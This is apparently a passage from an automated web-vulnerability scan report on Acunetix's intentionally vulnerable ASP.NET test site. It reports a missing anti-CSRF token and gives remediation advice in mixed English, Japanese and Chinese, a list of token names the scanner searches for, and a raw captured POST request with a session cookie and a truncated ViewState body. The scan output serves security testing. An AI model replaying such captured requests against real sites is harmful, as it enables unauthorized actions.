resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        23. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (456 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Content-Length: 10985
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10985 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9